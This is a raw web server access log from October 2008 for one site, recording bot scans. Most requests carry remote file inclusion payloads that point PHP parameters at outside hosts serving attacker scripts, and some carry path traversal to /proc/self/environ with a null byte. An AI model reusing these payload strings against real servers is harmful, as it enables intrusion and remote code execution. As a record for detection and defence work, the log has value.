98.136.50.138 - - [23/Oct/2008:09:00:00 -0700] "GET /logs/errors.php?error=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [23/Oct/2008:09:00:01 -0700] "GET /errors.php?error=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:00:13 -0700] "GET /logs/access_080309.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [23/Oct/2008:09:00:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [23/Oct/2008:09:00:16 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:00:19 -0700] "GET /logs/access_080309.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:00:29 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:00:30 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:34 -0700] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:00:34 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:34 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:40 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:00:45 -0700] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:00:45 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:48 -0700] "GET /index.php?option=com_babackup&Itemid=1&mosConfig_absolute_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 200 95248 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:52 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:53 -0700] "GET /logs/access_080115.log//ADMIN/header.php?language=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:00:53 -0700] "GET /ADMIN/header.php?language=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.95.194 - - [23/Oct/2008:09:00:53 -0700] "GET /logs//ADMIN/header.php?language=http://you-buy-viagra.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:54 -0700] "GET /logs/access_080905.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:00:55 -0700] "GET /logs/access_080905.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.116 - - [23/Oct/2008:09:00:59 -0700] "GET /appserv/main.php?appserv_root=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
211.115.110.116 - - [23/Oct/2008:09:00:59 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:00:59 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:02 -0700] "GET /logs/access_080920.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:03 -0700] "GET /logs/access_080822.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:06 -0700] "GET /logs/errors.php?error=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:06 -0700] "GET /errors.php?error=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:07 -0700] "GET /logs/access_080711.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.116 - - [23/Oct/2008:09:01:07 -0700] "GET /logs/access_080511.log//appserv/main.php?appserv_root=http://www.stormpages.com/singa/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:08 -0700] "GET /logs/access_080822.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:09 -0700] "GET /logs/access_080711.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:18 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:18 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:18 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:01:18 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:01:19 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:23 -0700] "GET /logs/access_080615.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [23/Oct/2008:09:01:24 -0700] "GET /logs/access_071222.log/errors.php?error=http://121.254.140.55/~shinapt//upload/File_Dir/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:25 -0700] "GET /logs/errors.php?error=http://121.254.140.55/~shinapt//upload/File_Dir/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.161 - - [23/Oct/2008:09:01:25 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://200.180.223.130/~elaine/id.txt?? HTTP/1.1" 200 95333 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.232.96 - - [23/Oct/2008:09:01:26 -0700] "GET /logs/access_080204.log/errors.php?error=http://121.254.140.55/~shinapt//upload/File_Dir/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:01:28 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:01:28 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:28 -0700] "GET /logs/access.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:28 -0700] "GET /logs/access_080828.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:32 -0700] "GET /logs/access_080615.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:37 -0700] "GET /logs/index.php?index=http://www.guimp.com/????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:01:37 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:01:38 -0700] "GET /logs/access.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:01:38 -0700] "GET /logs/access_080828.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:38 -0700] "GET /logs/access_080726.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:39 -0700] "GET /logs/access_080811.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:39 -0700] "GET /logs/errors.php?error=http://www.guimp.com/????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
210.245.226.28 - - [23/Oct/2008:09:01:40 -0700] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:41 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:41 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.226.28 - - [23/Oct/2008:09:01:41 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 200 95263 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.60.81 - - [23/Oct/2008:09:01:41 -0700] "GET /logs/index.php?index=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:42 -0700] "GET /logs/index.php?index=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
210.245.226.28 - - [23/Oct/2008:09:01:43 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:43 -0700] "GET /logs/access_080725.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:44 -0700] "GET /logs/access_080908.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:44 -0700] "GET /logs/access_080724.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:01:45 -0700] "GET /logs/access_080726.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:45 -0700] "GET /logs/access_080811.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:46 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:46 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:46 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.60.81 - - [23/Oct/2008:09:01:47 -0700] "GET /errors.php?error=http://www.guimp.com/????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:48 -0700] "GET /logs/access_080729.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.60.81 - - [23/Oct/2008:09:01:48 -0700] "GET /index.php?index=http://www.guimp.com/????? HTTP/1.1" 200 94777 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.227.60.81 - - [23/Oct/2008:09:01:48 -0700] "GET /index.php?index=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 95461 "-" "XXXXXX" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:49 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:01:49 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:01:49 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:49 -0700] "GET /logs/access_080725.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:50 -0700] "GET /index.php?index=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 95482 "-" "XXXXXX" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:01:50 -0700] "GET /logs/access_080624.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:50 -0700] "GET /logs/access_080908.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:01:50 -0700] "GET /logs/access_080724.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:01:53 -0700] "GET /logs/access_080729.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:01:55 -0700] "GET /logs/access_080624.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:07 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.152.5 - - [23/Oct/2008:09:02:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sh1zz.de//tmp/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
85.25.152.167 - - [23/Oct/2008:09:02:18 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.58.114 - - [23/Oct/2008:09:02:18 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.58.114 - - [23/Oct/2008:09:02:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:21 -0700] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:21 -0700] "GET /lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:21 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:24 -0700] "GET /logs/home.php?x=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:02:25 -0700] "GET /home.php?x=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:26 -0700] "GET /logs/access_080412.log/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:31 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:31 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:31 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:02:35 -0700] "GET /logs/access_080210.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:02:39 -0700] "GET /logs/access_080901.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:02:40 -0700] "GET /logs/access_080210.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:41 -0700] "GET /logs/access_080524.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:42 -0700] "GET /logs//main.php?appserv_root=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [23/Oct/2008:09:02:43 -0700] "GET /main.php?appserv_root=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:02:46 -0700] "GET /logs/access_080901.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:49 -0700] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:50 -0700] "GET /lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:50 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:02:54 -0700] "GET /logs/access_080524.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:02:55 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:02:55 -0700] "GET /logs/access_080412.log/lostpasswd.php?env[include_prefix]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:03:01 -0700] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:02 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.85.130.159 - - [23/Oct/2008:09:03:02 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.210.139.66 - - [23/Oct/2008:09:03:03 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:03:03 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [23/Oct/2008:09:03:06 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:03:07 -0700] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
